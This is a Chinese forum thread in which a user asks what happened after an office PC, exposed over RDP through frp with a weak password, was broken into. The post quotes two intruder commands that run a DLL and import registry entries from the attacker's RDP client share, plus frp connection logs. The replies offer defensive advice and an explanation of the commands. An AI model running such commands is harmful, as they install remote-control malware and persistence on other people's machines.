这是一个创建于 1147 天前的主题,其中的信息可能已经有所发展或是发生改变。
办公室有台没用的电脑,拿来刷网课。用 frp 打洞,直接开的 3389 端口,用 mstsc 远程控制。 才开了 2 天,就被人搞进来了,应该是弱口令的问题。
看到别人的操作记录
请问有人知道这是操作了什么不?
rundll32 \\tsclient\a\a.dll a regedit /s \\tsclient\a\r.reg frp 服务端日志
2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:38210] 2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:39680] 2022/10/27 06:17:02 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:40964] 2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:42406] 2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:43746] 2022/10/27 06:17:04 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:44924] 2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:46104] 2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:47126] 2022/10/27 06:17:06 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:48130] 2022/10/27 06:17:07 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:49162] 2022/10/27 06:38:56 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:49298] 2022/10/27 06:48:35 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.26.179.7:55213] 2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:37643] 2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:38109] 2022/10/27 07:04:11 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:62334] 2022/10/27 07:12:42 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [185.170.144.46:3172] 2022/10/27 07:13:48 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:56728] 2022/10/27 07:16:39 [I] [control.go:309] [fcd53d7a449ce30e] control writer is closing 20 条回复 2022-10-28 18:27:54 +08:00
 | 1 7zlid 2022-10-27 12:49:41 +08:00 via Android 重装系统吧 |
 | 2 cndns 2022-10-27 13:02:35 +08:00 RDP 使用 3389 和 SSH 使用 22 的都是勇士 |
 | 4 kingpo 2022-10-27 13:07:02 +08:00 改下 3389 端口 |
 | 5 maskerTUI 2022-10-27 13:09:26 +08:00 弱口令才是真正的问题 |
 | 6 villivateur 2022-10-27 13:09:38 +08:00  1 @cndns 用标准端口没有任何问题,比如 SSH ,如果关闭密码登录,只允许 RSA 密钥登录,随便黑客怎样都不可能攻破 |
 | 7 flexbug 2022-10-27 13:09:55 +08:00 via iPhone 建议使用向日葵或者 todesk 不要自己创造风险 |
 | 8 mcluyu 2022-10-27 13:38:50 +08:00 默认用户名(或者容易猜到的常见用户名)+ 弱口令, 至于使用什么端口根本无所谓。 |
 | 9 vmebeh 2022-10-27 13:40:57 +08:00 via iPhone 1 套个 wireguard 回来随便用 |
 | 12 0x73346b757234 2022-10-27 17:58:31 +08:00 黑阔用 rundll32 白加黑的方式执行了一个恶意 dll 文件,猜测是远控木马。注册表加了个一个记录也许是做了持久化。 |
 | 13 kongkongye 2022-10-27 18:03:19 +08:00 via iPhone 我上次也是,用 frp 无密码暴露了 docker |
 | 14 ungrown 2022-10-27 18:32:37 +08:00 via Android @villivateur #6 rdp 也可以这样吗只允许密钥登录? |
 | 15 zero47 2022-10-27 19:26:12 +08:00 之前用凉心云搭 transmission 远程下载,每次登上去都提示密码错误次数过多,要求重启。什么端口都没用,专门有人恶意扫端口的,还是好好加密比较重要。ssh 用 22 我觉得没问题,用证书加密就好。 |
 | 16 MasterofNone 2022-10-27 20:11:47 +08:00 rdp 可以上证书验证吗? |
 | 17 swulling 2022-10-27 20:13:33 +08:00 via iPhone 不要暴露任何控制端口到公网 |
 | 18 aver4vex 2022-10-27 20:28:04 +08:00 我现在就是软路由开 wireguard 服务。随便折腾。 |
 | 19 PerFectTime 2022-10-28 10:33:52 +08:00 VPN 连回家最安全,商业公司的软件你也不知道里面有没有 0day |
 | 20 HFX3389 2022-10-28 18:27:54 +08:00 frp 开 stcp 呗,不用普通的 tcp |
Select Language